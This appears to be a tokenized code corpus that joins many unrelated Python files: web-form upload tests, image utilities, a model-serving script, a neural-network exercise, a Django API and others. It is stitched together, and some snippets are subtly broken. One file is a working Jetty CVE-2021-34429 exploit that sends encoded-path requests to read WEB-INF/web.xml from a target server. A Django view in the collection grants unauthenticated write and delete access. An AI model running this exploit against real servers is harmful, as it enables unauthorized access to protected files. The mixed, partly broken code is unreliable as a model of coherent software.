multiple_form["multiple"].value=['Nine']<assert_stmt>multiple_form["multiple"].value<eq>['Nine']<line_sep># reset with force_value multiple_form["multiple"].force_value(<none>)<line_sep>self.assertIsNone(multiple_form["multiple"].value)<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected </p>" display display)<block_end><block_end><class_stmt>SingleUploadFileApp<block_start>body=b""" <html> <head><title>form page</title></head> <body> <form method="POST" id="file_upload_form" enctype="multipart/form-data"> <input name="file-field" type="file" value="some/path/file.txt" /> <input name="int-field" type="text" value="" /> <input name="button" type="submit" value="single"> </form> </body> </html> """<def_stmt>__call__ self environ start_response<block_start>req=Request(environ)<line_sep>status=b"200 OK"<if_stmt>req.method<eq>"GET"<block_start>body=self.body<block_end><else_stmt><block_start>body=b""" <html> <head><title>display page</title></head> <body> """+self.get_files_page(req)+b""" </body> </html> """<block_end>headers=[('Content-Type' 'text/html; charset=utf-8') ('Content-Length' str(len(body)))]<line_sep># PEP 3333 requires native strings: headers=[(str(k) str(v))<for>k,v headers]<line_sep>start_response(status headers)<assert_stmt>(isinstance(body bytes))<line_sep><return>[body]<block_end><def_stmt>get_files_page self req<block_start>file_parts=[]<line_sep>uploaded_files=[(k v)<for>k,v req.POST.items()<if>'file'<in>k]<line_sep>uploaded_files=sorted(uploaded_files)<for_stmt>name,uploaded_file uploaded_files<block_start><if_stmt>isinstance(uploaded_file cgi.FieldStorage)<block_start>filename=to_bytes(uploaded_file.filename)<line_sep>value=to_bytes(uploaded_file.value 'ascii')<line_sep>content_type=to_bytes(uploaded_file.type 'ascii')<block_end><else_stmt><block_start>filename=value=content_type=b''<block_end>file_parts.append(b""" <p>You selected '"""+filename+b"""'</p> <p>with contents: '"""+value+b"""'</p> <p>with content type: '"""+content_type+b"""'</p> """)<block_end><return>b''.join(file_parts)<block_end><block_end><class_stmt>UploadBinaryApp(SingleUploadFileApp)<block_start><def_stmt>get_files_page self req<block_start>uploaded_files=[(k v)<for>k,v req.POST.items()<if>'file'<in>k]<line_sep>data=uploaded_files[0][1].value<line_sep>data=struct.unpack(b'255h' data[:510])<line_sep><return>b','.join([to_bytes(str(i))<for>i data])<block_end><block_end><class_stmt>MultipleUploadFileApp(SingleUploadFileApp)<block_start>body=b""" <html> <head><title>form page</title></head> <body> <form method="POST" id="file_upload_form" enctype="multipart/form-data"> <input name="file-field-1" type="file" /> <input name="file-field-2" type="file" /> <input name="button" type="submit" value="single"> </form> </body> </html> """<block_end><class_stmt>TestFileUpload(unittest.TestCase)<block_start><def_stmt>assertFile self name contents display content_type=<none><block_start><if_stmt>isinstance(name bytes)<block_start>text_name=name.decode('ascii')<block_end><else_stmt><block_start>text_name=name<block_end>self.assertIn("<p>You selected '"+text_name+"'</p>" display display)<if_stmt>isinstance(contents bytes)<block_start>text_contents=contents.decode('ascii')<block_end><else_stmt><block_start>text_contents=contents<block_end>self.assertIn("<p>with contents: '"+text_contents+"'</p>" display display)<if_stmt>content_type<block_start>self.assertIn("<p>with content type: '"+content_type+"'</p>" display display)<block_end><block_end><def_stmt>test_no_uploads_error 
self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>app.get('/').forms["file_upload_form"].upload_fields()<block_end><def_stmt>test_upload_without_file self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>upload_form=app.get('/').forms["file_upload_form"]<line_sep>upload_form.submit()<block_end><def_stmt>test_file_upload_with_filename_only self<block_start>uploaded_file_name=os.path.join(os.path.dirname(__file__) "__init__.py")<line_sep>uploaded_file_contents=open(uploaded_file_name).read()<line_sep>uploaded_file_contents=to_bytes(uploaded_file_contents)<line_sep>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>self.assertEqual(res.charset 'utf-8')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" (uploaded_file_name ))<line_sep>display=single_form.submit("button")<line_sep>self.assertFile(uploaded_file_name uploaded_file_contents display)<block_end><def_stmt>test_file_upload_with_filename_and_contents self<block_start>uploaded_file_name=os.path.join(os.path.dirname(__file__) "__init__.py")<line_sep>uploaded_file_contents=open(uploaded_file_name).read()<line_sep>uploaded_file_contents=to_bytes(uploaded_file_contents)<line_sep>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" (uploaded_file_name uploaded_file_contents))<line_sep>display=single_form.submit("button")<line_sep>self.assertFile(uploaded_file_name uploaded_file_contents display)<block_end><def_stmt>test_file_upload_with_content_type self<block_start>uploaded_file_name=os.path.join(os.path.dirname(__file__) "__init__.py")<with_stmt>open(uploaded_file_name 'rb')<as>f<block_start>uploaded_file_contents=f.read()<block_end>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form["file-field"].value=Upload(uploaded_file_name uploaded_file_contents 'text/x-custom-type')<line_sep>display=single_form.submit("button")<line_sep>self.assertFile(uploaded_file_name uploaded_file_contents display content_type='text/x-custom-type')<block_end><def_stmt>test_file_upload_binary self<block_start>binary_data=struct.pack('255h' *range(0 255))<line_sep>app=webtest.TestApp(UploadBinaryApp())<line_sep>res=app.get('/')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" ('my_file.dat' binary_data))<line_sep>display=single_form.submit("button")<line_sep>self.assertIn(','.join([str(n)<for>n range(0 255)]) display)<block_end><def_stmt>test_multiple_file_uploads_with_filename_and_contents self<block_start>uploaded_file1_name=os.path.join(os.path.dirname(__file__) "__init__.py")<line_sep>uploaded_file1_contents=open(uploaded_file1_name).read()<line_sep>uploaded_file1_contents=to_bytes(uploaded_file1_contents)<line_sep>uploaded_file2_name=__file__<line_sep>uploaded_file2_name=os.path.join(os.path.dirname(__file__) 'html' 
"404.html")<line_sep>uploaded_file2_contents=open(uploaded_file2_name).read()<line_sep>uploaded_file2_contents=to_bytes(uploaded_file2_contents)<line_sep>app=webtest.TestApp(MultipleUploadFileApp())<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field-1" (uploaded_file1_name uploaded_file1_contents))<line_sep>single_form.set("file-field-2" (uploaded_file2_name uploaded_file2_contents))<line_sep>display=single_form.submit("button")<line_sep>self.assertFile(uploaded_file1_name uploaded_file1_contents display)<line_sep>self.assertFile(uploaded_file1_name uploaded_file1_contents display)<block_end><def_stmt>test_post_int self<block_start>binary_data=struct.pack('255h' *range(0 255))<line_sep>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" ('my_file.dat' binary_data))<line_sep>single_form.set("int-field" 100)<line_sep># just check it does not raise single_form.submit("button")<block_end><def_stmt>test_invalid_types self<block_start>binary_data=struct.pack('255h' *range(0 255))<line_sep>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" ('my_file.dat' binary_data))<line_sep>single_form.set("int-field" SingleUploadFileApp())<line_sep>self.assertRaises(ValueError single_form.submit "button")<block_end><def_stmt>test_upload_invalid_content self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>res=app.get('/')<line_sep>single_form=res.forms["file_upload_form"]<line_sep>single_form.set("file-field" ('my_file.dat' 1))<try_stmt><block_start>single_form.submit("button")<block_end><except_stmt>ValueError<block_start>e=sys.exc_info()[1]<line_sep>self.assertEquals(str(e) u('File content must be %s not %s'%(bytes int)))<block_end><block_end><def_stmt>test_invalid_uploadfiles self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>self.assertRaises(ValueError app.post '/' upload_files=[()])<line_sep>self.assertRaises(ValueError app.post '/' upload_files=[('name' 'filename' 'content' 'extra')])<block_end><def_stmt>test_goto_upload_files self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>resp=app.get('/')<line_sep>resp=resp.goto('/' method='post' upload_files=[('file' 'filename' b'content')])<line_sep>resp.mustcontain("<p>You selected 'filename'</p>" "<p>with contents: 'content'</p>")<block_end><def_stmt>test_post_upload_files self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>resp=app.post('/' upload_files=[('file' 'filename' b'content')])<line_sep>resp.mustcontain("<p>You selected 'filename'</p>" "<p>with contents: 'content'</p>")<block_end><def_stmt>test_post_upload_empty_files self<block_start>app=webtest.TestApp(SingleUploadFileApp())<line_sep>resp=app.post('/' upload_files=[('file' 'filename' b'')])<line_sep>resp.mustcontain("<p>You selected 'filename'</p>" "<p>with contents: ''</p>")<line_sep>resp=app.get('/')<line_sep>form=resp.form<line_sep>form['file-field']=Upload('filename' b'' 'text/plain')<line_sep>resp=form.submit()<line_sep>resp.mustcontain("<p>You selected 'filename'</p>" "<p>with contents: ''</p>")<block_end><block_end>
<import_stmt>os subprocess<line_sep>os.chdir(os.path.split(__file__)[0])<line_sep>subprocess.check_call(['python' 'test-c++.py'])<line_sep>subprocess.check_call(['python' 'test-go.py'])<line_sep>subprocess.check_call(['python' 'test-javascript.py'])<line_sep>subprocess.check_call(['python' 'test-markdowns.py'])<line_sep>
<import_stmt>io<import_from_stmt>pydantic confloat<import_from_stmt>PIL Image<import_stmt>numpy<as>np<import_stmt>imageio<import_stmt>logging<line_sep>Proportion=confloat(ge=0 le=1)<line_sep>log=logging.getLogger(__name__)<def_stmt>save_img im_array output_path<block_start>imageio.imwrite(output_path im_array)<block_end><def_stmt>numpy_to_png array:np.ndarray<arrow>bytes<block_start>"""Get PNG-encoded bytes from a Numpy array. Args: array: A Numpy array of shape (h, w, 3) or (h, w), where the former is meant to become a three-channel image and the latter a one-channel image. The dtype of the array should be uint8. Returns: bytes """<line_sep>im=Image.fromarray(array)<line_sep>output=io.BytesIO()<line_sep>im.save(output 'png')<line_sep><return>output.getvalue()<block_end><def_stmt>png_to_numpy png:bytes dtype=np.uint8<arrow>np.ndarray<block_start>"""Get a Numpy array from PNG-encoded bytes. Args: png: A bytes object containing a PNG-formatted image. Returns: numpy.ndarray """<line_sep>incoming=io.BytesIO(png)<line_sep>im=Image.open(incoming)<line_sep><return>np.array(im)<block_end>
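A minimal round-trip sketch of the two helpers above; the array contents and shape are arbitrary examples I chose, not taken from the original module.

import numpy as np

# Hypothetical usage: encode a small RGB array to PNG bytes and decode it back.
arr = np.zeros((8, 8, 3), dtype=np.uint8)
arr[:, :, 0] = 255                    # a tiny all-red image
png_bytes = numpy_to_png(arr)         # PNG-encoded bytes
restored = png_to_numpy(png_bytes)    # back to an (8, 8, 3) uint8 array
assert (restored == arr).all()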
<import_stmt>io<import_stmt>numpy<as>np<import_stmt>os<import_from_stmt>azureml.core Model<import_from_stmt>azureml.contrib.services.aml_request rawhttp<import_from_stmt>azureml.contrib.services.aml_response AMLResponse<import_from_stmt>PIL Image<import_from_stmt>onnxruntimetriton InferenceSession<def_stmt>preprocess img scaling# , dtype): <block_start>"""Pre-process an image to meet the size, type and format requirements specified by the parameters. """<line_sep>c=3<line_sep>h=224<line_sep>w=224<line_sep>format="FORMAT_NCHW"<if_stmt>c<eq>1<block_start>sample_img=img.convert("L")<block_end><else_stmt><block_start>sample_img=img.convert("RGB")<block_end>resized_img=sample_img.resize((w h) Image.BILINEAR)<line_sep>resized=np.array(resized_img)<if_stmt>resized.ndim<eq>2<block_start>resized=resized[: : np.newaxis]<block_end># npdtype = triton_to_np_dtype(dtype) typed=resized.astype(np.float32)<line_sep># typed = resized <if_stmt>scaling<eq>"INCEPTION"<block_start>scaled=(typed/128)-1<block_end><elif_stmt>scaling<eq>"VGG"<block_start><if_stmt>c<eq>1<block_start>scaled=typed-np.asarray((128 ) dtype=npdtype)<block_end><else_stmt><block_start>scaled=typed-np.asarray((123 117 104) dtype=npdtype)<block_end><block_end><else_stmt><block_start>scaled=typed<block_end># Swap to CHW if necessary <if_stmt>format<eq>"FORMAT_NCHW"<block_start>ordered=np.transpose(scaled (2 0 1))<block_end><else_stmt><block_start>ordered=scaled<block_end># Channels are in RGB order. Currently model configuration data # doesn't provide any information as to other channel orderings # (like BGR) so we just assume RGB. <return>ordered<block_end><def_stmt>postprocess output_array<block_start>"""Post-process results to show the predicted label."""<line_sep>output_array=output_array[0]<line_sep>max_label=np.argmax(output_array)<line_sep>final_label=label_dict[max_label]<line_sep><return>f"{max_label} : {final_label}"<block_end><def_stmt>init <block_start><global>session label_dict<line_sep>session=InferenceSession(path_or_bytes="densenet_onnx")<line_sep>model_dir=os.path.join(os.environ["AZUREML_MODEL_DIR"] "models")<line_sep>folder_path=os.path.join(model_dir "triton" "densenet_onnx")<line_sep>label_path=os.path.join(model_dir "triton" "densenet_onnx" "densenet_labels.txt")<line_sep>label_file=open(label_path "r")<line_sep>labels=label_file.read().split("\n")<line_sep>label_dict=dict(enumerate(labels))<block_end>@rawhttp<async_keyword><def_stmt>run request<block_start>"""This function is called every time your webservice receives a request. Notice you need to know the names and data types of the model inputs and outputs. You can get these values by reading the model configuration file or by querying the model metadata endpoint. """<if_stmt>request.method<eq>"POST"<block_start>outputs=[]<for_stmt>output session.get_outputs()<block_start>outputs.append(output.name)<block_end>input_name=session.get_inputs()[0].name<line_sep>reqBody=<await>request.get_data()<line_sep>img=Image.open(io.BytesIO(reqBody))<line_sep>image_data=preprocess(img scaling="INCEPTION")<line_sep>res=session.run(outputs {input_name:image_data})<line_sep>result=postprocess(output_array=res)<line_sep><return>AMLResponse(result 200)<block_end><else_stmt><block_start><return>AMLResponse("bad request" 500)<block_end><block_end>
# Generated by Django 3.2.7 on 2021-10-15 08:15 <import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('resource_tracker' '0004_alter_resourcepoolattributedefinition_resource_pool') ]<line_sep>operations=[migrations.RenameField(model_name='resourcegroupattributedefinition' old_name='resource_group_definition' new_name='resource_group' ) migrations.RenameField(model_name='resourcegrouptextattributedefinition' old_name='resource_group_definition' new_name='resource_group' ) migrations.AlterUniqueTogether(name='resourcegroupattributedefinition' unique_together={('name' 'resource_group')} ) migrations.AlterUniqueTogether(name='resourcegrouptextattributedefinition' unique_together={('name' 'resource_group')} ) ]<block_end>
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------

# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/shortestPath.dml

<import_from_stmt>typing Dict Iterable<import_from_stmt>systemds.operator OperationNode Matrix Frame List MultiReturn Scalar<import_from_stmt>systemds.script_building.dag OutputType<import_from_stmt>systemds.utils.consts VALID_INPUT_TYPES<def_stmt>shortestPath G:Matrix sourceNode:int **kwargs:Dict[str VALID_INPUT_TYPES]<block_start>"""
    :param G: adjacency matrix of the graph; values can be 0/1 (just specifying whether the nodes
        are connected or not) or integer values (representing the weight of the edges or the
        distances between nodes, 0 if not connected).
    :param maxi: Integer max number of iterations accepted (0 for FALSE, i.e.
        max iterations not defined)
    :param sourceNode: node index to calculate the shortest paths to all other nodes.
    :param verbose: flag for verbose debug output
    :return: 'OperationNode' containing the minimum distance (shortest-path) from vertex i to
        vertex j; if the minimum distance is infinity, the two nodes are not connected.
    """<line_sep>params_dict={'G':G 'sourceNode':sourceNode}<line_sep>params_dict.update(kwargs)<line_sep><return>Matrix(G.sds_context 'shortestPath' named_input_nodes=params_dict)<block_end>
# to compute modular power # Iterative Function to calculate # (x^y)%p in O(log y) <def_stmt>power x y p<block_start>res=1# Initialize result # Update x if it is more # than or equal to p x=x%p<while_stmt>(y<g>0)# If y is odd, multiply # x with result <block_start><if_stmt>((y&1)<eq>1)<block_start>res=(res<times>x)%p<block_end># y must be even now y=y<rshift>1# y = y/2 x=(x<times>x)%p<block_end><return>res<block_end>
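A quick sanity check of power() above; the inputs are arbitrary examples I chose, and the expected values can be cross-checked against Python's built-in pow(x, y, p).

print(power(2, 10, 1000))    # 1024 % 1000 -> 24
print(power(3, 200, 13))     # -> 9
assert power(3, 200, 13) == pow(3, 200, 13)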
<import_from_stmt>rest_framework generics<import_from_stmt>.models AssetInfo<import_from_stmt>.serializers AssetSerializer<import_from_stmt>rest_framework permissions<class_stmt>AssetList(generics.ListCreateAPIView)<block_start>queryset=AssetInfo.objects.all()<line_sep>serializer_class=AssetSerializer<line_sep>permission_classes=(permissions.AllowAny )<block_end><class_stmt>AssetDetail(generics.RetrieveUpdateDestroyAPIView)<block_start>queryset=AssetInfo.objects.all()<line_sep>serializer_class=AssetSerializer<line_sep>permission_classes=(permissions.AllowAny )<block_end>
<import_from_stmt>gazette.spiders.base.fecam FecamGazetteSpider<class_stmt>ScPescariaBravaSpider(FecamGazetteSpider)<block_start>name="sc_pescaria_brava"<line_sep>FECAM_QUERY='entidade:"Prefeitura Municipal de Pescaria Brava"'<line_sep>TERRITORY_ID="4212650"<block_end>
<import_stmt>requests<line_sep># Vuln Base Info <def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''Jetty Authorization Before Parsing and Canonicalization Variation''' "description":'''For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.''' "severity":"medium" "references":["https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm"] "classification":{"cvss-metrics":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" "cvss-score":"" "cve-id":"CVE-2021-34429" "cwe-id":"CWE-200"} "metadata":{"vuln-target":"" } "tags":["cve" "cve2021" "jetty"] }<block_end># Vender Fingerprint <def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept <def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>path="""/%u002e/WEB-INF/web.xml"""<line_sep>method="GET"<line_sep>data=""""""<line_sep>headers={}<line_sep>resp0=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<line_sep>path="""/.%00/WEB-INF/web.xml"""<line_sep>method="GET"<line_sep>data=""""""<line_sep>headers={}<line_sep>resp1=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>(resp1.status_code<eq>200)<and>("""</web-app>"""<in>resp1.text<and>"""java.sun.com"""<in>resp1.text)<and>("""application/xml"""<in>str(resp1.headers))<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc() <def_stmt>exp url<block_start><return>poc(url)<block_end># Utils <def_stmt>format_url url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end>
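A minimal invocation sketch for the module above; the target URL is a placeholder (an RFC 5737 documentation address), not a host from the original.

if __name__ == '__main__':
    # Placeholder target; only test hosts you are authorized to assess.
    result = poc("http://192.0.2.10:8080")
    if result.get("success"):
        print("vulnerable:", result["payload"])
    else:
        print("not vulnerable or unreachable")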
<import_stmt>numpy<as>np<import_stmt>random<import_from_stmt>q1_softmax softmax<import_from_stmt>q2_sigmoid sigmoid sigmoid_grad<import_from_stmt>q2_gradcheck gradcheck_naive<def_stmt>affine_forward x w b<block_start>""" Computes the forward pass for an affine (fully-connected) layer. The input x has shape (N, d_1, ..., d_k) and contains a minibatch of N examples, where each example x[i] has shape (d_1, ..., d_k). We will reshape each input into a vector of dimension D = d_1 * ... * d_k, and then transform it to an output vector of dimension M. Inputs: - x: A numpy array containing input data, of shape (N, d_1, ..., d_k) - w: A numpy array of weights, of shape (D, M) - b: A numpy array of biases, of shape (M,) Returns a tuple of: - out: output, of shape (N, M) - cache: (x, w, b) """<line_sep>out=<none><line_sep>N=x.shape[0]<line_sep>D=np.prod(x.shape[1:])<line_sep>M=b.shape[1]<line_sep>out=np.dot(x.reshape(N D) w.reshape(D M))+b.reshape(1 M)<line_sep><return>out (x w b)<block_end><def_stmt>affine_backward dout cache<block_start>""" Computes the backward pass for an affine layer. Inputs: - dout: Upstream derivative, of shape (N, M) - cache: Tuple of: - x: Input data, of shape (N, d_1, ... d_k) - w: Weights, of shape (D, M) Returns a tuple of: - dx: Gradient with respect to x, of shape (N, d1, ..., d_k) - dw: Gradient with respect to w, of shape (D, M) - db: Gradient with respect to b, of shape (M,) """<line_sep>x,w,b=cache<line_sep>dx,dw,db=<none> <none> <none><line_sep>N=x.shape[0]<line_sep>D=np.prod(x.shape[1:])<line_sep>M=b.shape[1]<line_sep>dx=np.dot(dout w.reshape(D M).T).reshape(x.shape)<line_sep>dw=np.dot(x.reshape(N D).T dout).reshape(w.shape)<line_sep>db=np.sum(dout axis=0)<line_sep><return>dx dw db<block_end><def_stmt>sigmoid_forward x<block_start>""" Computes the forward pass for a sigmoid activation. Inputs: - x: Input data, numpy array of arbitary shape; Returns a tuple (out, cache) - out: output of the same shape as x - cache: identical to out; required for backpropagation """<line_sep><return>sigmoid(x) sigmoid(x)<block_end><def_stmt>sigmoid_backward dout cache<block_start>""" Computes the backward pass for an sigmoid layer. Inputs: - dout: Upstream derivative, same shape as the input to the sigmoid layer (x) - cache: sigmoid(x) Returns a tuple of: - dx: back propagated gradient with respect to x """<line_sep>x=cache<line_sep><return>sigmoid_grad(x)<times>dout<block_end><def_stmt>forward_backward_prop data labels params dimensions<block_start>""" Forward and backward propagation for a two-layer sigmoidal network Compute the forward propagation and for the cross entropy cost, and backward propagation for the gradients for all parameters. 
"""<line_sep>### Unpack network parameters (do not modify) ofs=0<line_sep>Dx,H,Dy=(dimensions[0] dimensions[1] dimensions[2])<line_sep>N=data.shape[0]<line_sep>W1=np.reshape(params[ofs:ofs+Dx<times>H] (Dx H))<line_sep>ofs<augadd>Dx<times>H<line_sep>b1=np.reshape(params[ofs:ofs+H] (1 H))<line_sep>ofs<augadd>H<line_sep>W2=np.reshape(params[ofs:ofs+H<times>Dy] (H Dy))<line_sep>ofs<augadd>H<times>Dy<line_sep>b2=np.reshape(params[ofs:ofs+Dy] (1 Dy))<line_sep>### YOUR CODE HERE: forward propagation hidden=np.dot(data W1)+b1<line_sep>layer1_a=sigmoid(hidden)<line_sep>layer2=np.dot(layer1_a W2)+b2<line_sep># need to calculate the softmax loss probs=softmax(layer2)<line_sep>cost=-np.sum(np.log(probs[np.arange(N) np.argmax(labels axis=1)]))<line_sep>### END YOUR CODE ### YOUR CODE HERE: backward propagation #There is no regularization :/ # dx -> sigmoid -> W2 * layer1_a + b -> sigmoid -> W1 * data + b1 -> .. dx=probs.copy()<line_sep>dx<augsub>labels<line_sep>dlayer2=np.zeros_like(dx)<line_sep>gradW2=np.zeros_like(W2)<line_sep>gradW1=np.zeros_like(W1)<line_sep>gradb2=np.zeros_like(b2)<line_sep>gradb1=np.zeros_like(b1)<line_sep>gradW2=np.dot(layer1_a.T dx)<line_sep>gradb2=np.sum(dx axis=0)<line_sep>dlayer2=np.dot(dx W2.T)<line_sep>dlayer1=sigmoid_grad(layer1_a)<times>dlayer2<line_sep>gradW1=np.dot(data.T dlayer1)<line_sep>gradb1=np.sum(dlayer1 axis=0)<line_sep># Decided to implement affine (forward and backward function) # sigmoid (forward and backward function) # These should work properly; # scores, cache_1 = affine_forward(data, W1, b1) # scores, cache_s1 = sigmoid_forward(scores) # scores, cache_2 = affine_forward(scores, W2, b2) # # need to calculate the softmax loss # probs = softmax(scores) # cost = -np.sum(np.log(probs[np.arange(N), np.argmax(labels)] + 1e-12)) / N # softmax_dx = probs.copy() # softmax_dx[np.arange(N), np.argmax(labels,axis=1)] -= 1 # softmax_dx /= N # grads = {} # dlayer2, grads['W2'], grads['b2'] = affine_backward(softmax_dx, cache_2) # dlayer1s = sigmoid_backward(dlayer2, cache_s1) # dlayer1, grads['W1'], grads['b1'] = affine_backward(dlayer1s, cache_1) #softmax_dx is the gradient of the loss w.r.t. y_{est} ### END YOUR CODE ### Stack gradients (do not modify) grad=np.concatenate((gradW1.flatten() gradb1.flatten() gradW2.flatten() gradb2.flatten()))<line_sep><return>cost grad<block_end><def_stmt>sanity_check <block_start>""" Set up fake data and parameters for the neural network, and test using gradcheck. """<line_sep>print("Running sanity check...")<line_sep>N=300<line_sep>dimensions=[10 5 10]<line_sep>data=np.random.randn(N dimensions[0])# each row will be a datum labels=np.zeros((N dimensions[2]))<for_stmt>i range(N)<block_start>labels[i random.randint(0 dimensions[2]-1)]=1<block_end>params=np.random.randn((dimensions[0]+1)<times>dimensions[1]+(dimensions[1]+1)<times>dimensions[2] )<line_sep>#cost, _ = forward_backward_prop(data, labels, params, dimensions) # # expect to get 1 in 10 correct #print(np.exp(-cost)) # #cost is roughly correct gradcheck_naive(<lambda>params:forward_backward_prop(data labels params dimensions) params)<block_end><def_stmt>your_sanity_checks <block_start>""" Use this space add any additional sanity checks by running: python q2_neural.py This function will not be called by the autograder, nor will your additional tests be graded. 
"""<line_sep>print("Running your sanity checks...")<line_sep>### YOUR CODE HERE #raise NotImplementedError ### END YOUR CODE <block_end><if_stmt>__name__<eq>"__main__"<block_start>sanity_check()<line_sep>your_sanity_checks()<block_end>
# -*-coding:utf8-*-#
__author__='play4fun'<line_sep>"""
create time:15-10-24 5:26 PM
"""<import_stmt>cv2<import_stmt>numpy<as>np<import_from_stmt>matplotlib pyplot<as>plt<line_sep>img=cv2.imread('../data/contrast75.png' 0)<line_sep># flatten() turns the array into one dimension
hist,bins=np.histogram(img.flatten() 256 [0 256])<line_sep># compute the cumulative distribution
cdf=hist.cumsum()<line_sep>##
# Build a NumPy masked array from cdf: elements equal to 0 are masked (ignored in the computation)
cdf_m=np.ma.masked_equal(cdf 0)<line_sep>cdf_m=(cdf_m-cdf_m.min())<times>255/(cdf_m.max()-cdf_m.min())<line_sep># Fill the masked elements with 0
cdf=np.ma.filled(cdf_m 0).astype('uint8')<line_sep>img2=cdf[img]<line_sep># cv2.imshow("img2",img2)
# cv2.waitKey(0)
##
# flatten() turns the array into one dimension
hist,bins=np.histogram(img2.flatten() 256 [0 256])<line_sep># compute the cumulative distribution
cdf=hist.cumsum()<line_sep>cdf_normalized=cdf<times>hist.max()/cdf.max()<line_sep>plt.plot(cdf_normalized color='b')<line_sep>plt.hist(img.flatten() 256 [0 256] color='r')<line_sep>plt.xlim([0 256])<line_sep>plt.legend(('cdf' 'histogram') loc='upper left')<line_sep>plt.show()<line_sep>'''
Histogram equalization is often used as a reference tool to bring all images to the same brightness conditions. This is useful in many cases, for example face recognition: before training a classifier, all training images are first histogram-equalized so that they share the same brightness conditions.
'''<line_sep>
"""! @brief Neural and oscillatory network module. Consists of models of bio-inspired networks. @authors <NAME> (<EMAIL>) @date 2014-2020 @copyright BSD-3-Clause """<import_stmt>math<import_from_stmt>enum IntEnum<class_stmt>initial_type(IntEnum)<block_start>"""! @brief Enumerator of types of oscillator output initialization. """<line_sep>## Output of oscillators are random in line with gaussian distribution. RANDOM_GAUSSIAN=0<line_sep>## Output of oscillators are equidistant from each other (uniformly distributed, not randomly). EQUIPARTITION=1<block_end><class_stmt>solve_type(IntEnum)<block_start>"""! @brief Enumerator of solver types that are used for network simulation. """<line_sep>## Forward Euler first-order method. FAST=0# Usual calculation: x(k + 1) = x(k) + f(x(k)). ## Classic fourth-order Runge-Kutta method (fixed step). RK4=1<line_sep>## Runge-Kutta-Fehlberg method with order 4 and 5 (float step)." RKF45=2<block_end><class_stmt>conn_type(IntEnum)<block_start>"""! @brief Enumerator of connection types between oscillators. """<line_sep>## No connection between oscillators. NONE=0<line_sep>## All oscillators have connection with each other. ALL_TO_ALL=1<line_sep>## Connections between oscillators represent grid where one oscillator can be connected with four neighbor oscillators: right, upper, left, lower. GRID_FOUR=2<line_sep>## Connections between oscillators represent grid where one oscillator can be connected with eight neighbor oscillators: right, right-upper, upper, upper-left, left, left-lower, lower, lower-right. GRID_EIGHT=3<line_sep>## Connections between oscillators represent bidirectional list. LIST_BIDIR=4<line_sep>## Connections are defined by user or by network during simulation. DYNAMIC=5<block_end><class_stmt>conn_represent(IntEnum)<block_start>"""! @brief Enumerator of internal network connection representation between oscillators. """<line_sep>## Each oscillator has list of his neighbors. LIST=0<line_sep>## Connections are represented my matrix connection NxN, where N is number of oscillators. MATRIX=1<block_end><class_stmt>network<block_start>"""! @brief Common network description that consists of information about oscillators and connection between them. """<line_sep>_num_osc=0<line_sep>_osc_conn=<none><line_sep>_conn_represent=<none><line_sep>__conn_type=<none><line_sep>__height=0<line_sep>__width=0<line_sep>@property<def_stmt>height self<block_start>"""! @brief Height of the network grid (that is defined by amout of oscillators in each 